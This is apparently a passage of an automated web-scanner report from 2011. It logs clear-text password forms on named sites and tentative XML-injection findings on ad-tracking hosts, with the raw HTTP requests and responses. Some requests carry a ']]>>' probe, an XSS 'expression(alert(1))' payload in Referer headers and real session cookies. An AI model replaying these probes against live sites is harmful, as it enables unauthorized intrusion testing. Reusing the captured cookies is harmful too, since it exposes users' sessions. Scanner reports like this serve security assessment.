Date: Thu, 03 Feb 2011 13:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

7.38. http://www.sipc.org/index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

7.39. http://www.supermedia.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:15:20 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do')"
   action="/spportal/indexLogin.do" method="POST">

<table>
...[SNIP]...
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext">
...[SNIP]...

8. XML injection  previous  next
There are 22 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://a.dlqm.net
Path:   /adscgen/log_ut_err.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/log_ut_err.php HTTP/1.1
Host: a.dlqm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:08:39 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=920
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1052


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.2. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://a.dlqm.net
Path:   /adscgen/log_ut_err.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/log_ut_err.php]]>> HTTP/1.1
Host: a.dlqm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:08:41 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=416
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1052


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/st.php?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:07:30 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>>?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:07:33 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1065


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

8.5. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages]]>>/scripts/0011/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9C15F15B82D40C76
x-amz-id-2: wNJIJ83ykwAkC58TMCPYdUkX8NaamV0sVVuW6EQbZIkIkks+CgGSRVkhiY9LkJih
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a3e6ae6f818a5a6cbe871e022815d1a29c6e64b3eb0371e5d99bb249539be54a6c242f3cf8648a3a
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9C15F15B82D40C76</RequestId><HostId>wNJIJ83ykwAkC58TMCPYdUkX8NaamV0sVVuW6EQbZIkIkks+Cg
...[SNIP]...

8.6. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts]]>>/0011/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 88BCC49D76FA1A6E
x-amz-id-2: fZdZIzgsDfXhAhMv+UJ2M9Yf0tfp2mvLvIPyVCM7q0NUe2EnPQgwxQahg9GAlyb7
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1933c67feaaccd5bf7907aef7a92cf254a33ce37678ed363fba79a37b3262b35898e4d054ba6dacb
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>88BCC49D76FA1A6E</RequestId><HostId>fZdZIzgsDfXhAhMv+UJ2M9Yf0tfp2mvLvIPyVCM7q0NUe2EnPQ
...[SNIP]...

8.7. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts/0011]]>>/2796.js HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EE50C759A0C61CB7
x-amz-id-2: xKWPoWQP3zREdefgI9vSsQ+F4e8jzx2JXT8EMb9FdD7nxglkDwnlwVJQAJx+kM9x
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:51 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1c6fd79e002fd3a572763cf1256ecfd3830756422ea41418adae6d6c0473336e2067898d88b3f39d
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE50C759A0C61CB7</RequestId><HostId>xKWPoWQP3zREdefgI9vSsQ+F4e8jzx2JXT8EMb9FdD7nxglkDw
...[SNIP]...

8.8. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://dnn506yrbagrg.cloudfront.net
Path:   /pages/scripts/0011/2796.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pages/scripts/0011/2796.js]]>> HTTP/1.1
Host: dnn506yrbagrg.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1A25451BD32755E1
x-amz-id-2: uNfwwSw+L/RlkBX+TKy5FE38Zb4LanV/2v3qmsgLzAXWxAaxB4Y2K4ry+I8iXXVR
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:04:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce857294f2db24fb5e2f8f563f97e3d3eba0b6be2f091c88544f1f413c38208980c5b08808c462a4
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 f564d0c1e4568b2b822f986a309f4114.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1A25451BD32755E1</RequestId><HostId>uNfwwSw+L/RlkBX+TKy5FE38Zb4LanV/2v3qmsgLzAXWxAaxB4
...[SNIP]...

8.9. http://loadus.exelator.com/load/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSwsDQ0Mza1rASUAFEE%253D; myPAL=eJx90D0TwiAMgOH%252F0qwMSQoE6FR18c46aPW6Ojo7qv%252Fd0Ert0HPj4OHl45Ziet4TNo%252FEkiqyPkKMkYDQAnqEXgedznDV3BNl5jMT92WCgEjKBIviOTartVitzI6x4ICDqyWaGll0E1s3VttNb%252FbHqzl1g9keOtPuhrzTzgcE%252BXOA%252B7GwYGFifWFeGYUlY0SwwUNeldUI4RS5lEjIbIqUD5Ra38BwZrR67xdS1bw%252F4wdQXA%253D%253D; BFF=eJytksFugzAQRP%252BFL7C9kMXmkjQ9BClQKThRe6o45pxjmn%252FPQoGs0fpAxHVmdtbWvtYZcPeb08olXqu02lprTVJcnU5zLMgAl1RftT8cf34vZVP6pGgdRGc2lmayQWdSkAVm2E5HxSowIzn9l5nSNew%252B%252FNbkGaAdXtgZ0OtMGJOgDGI2M8r6IlaQLiTFilP1LVaQLiQ1%252FReNYIjd%252B2MldpMuJMWK3afQDb3Ok2Y8SLAOAyuoQXZGzzHJXyf3TBprZicLrWBDzjacIxvOsSxwg8KNUSl9%252BU%252Fpzt0M7sjiy%252BWGmYz5DE7OJD5kqntYI1RHGV6O7HJCVwRyOX8r47YyW%252B%252BCFOPl8QSq6EMG; TFF=eJydlEuOgzAMQO%252FSE9hOgu2w4RizZcFipO5mdlXvPobSUMXpKHSBEkXvxR8McybJt5%252BMlC8IcYIBJlWlyzhnyrfvjKM9UdgW2LaDjnfH48qHiid7YuVx0foMWyFWpOzk4O9evpbr%252FLvUd%252BtuELbKYJgAsFU2p8Lb1vN12Ru%252FBsLK46L1GbYydN695kQxvatBjhrkwceDJ0mBtW6Xj%252BRNVA1Mn5gBiDn1mlzEPsPOYurN6jnE0h56OXhp8C4j8XHkdejFDf07Y3unAFOU4f9I5EPtXqdihwC9tz8bgHCuYTt%252FtmGmnWkYcrA5oWZmevDa4F1m6uOU%252F9dD6zPWDzl0kfc%252F%252B2Zmpg%253D%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:16:20 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.10. http://loadus.exelator.com/load/net.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.11. http://loadus.exelator.com/load/net.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
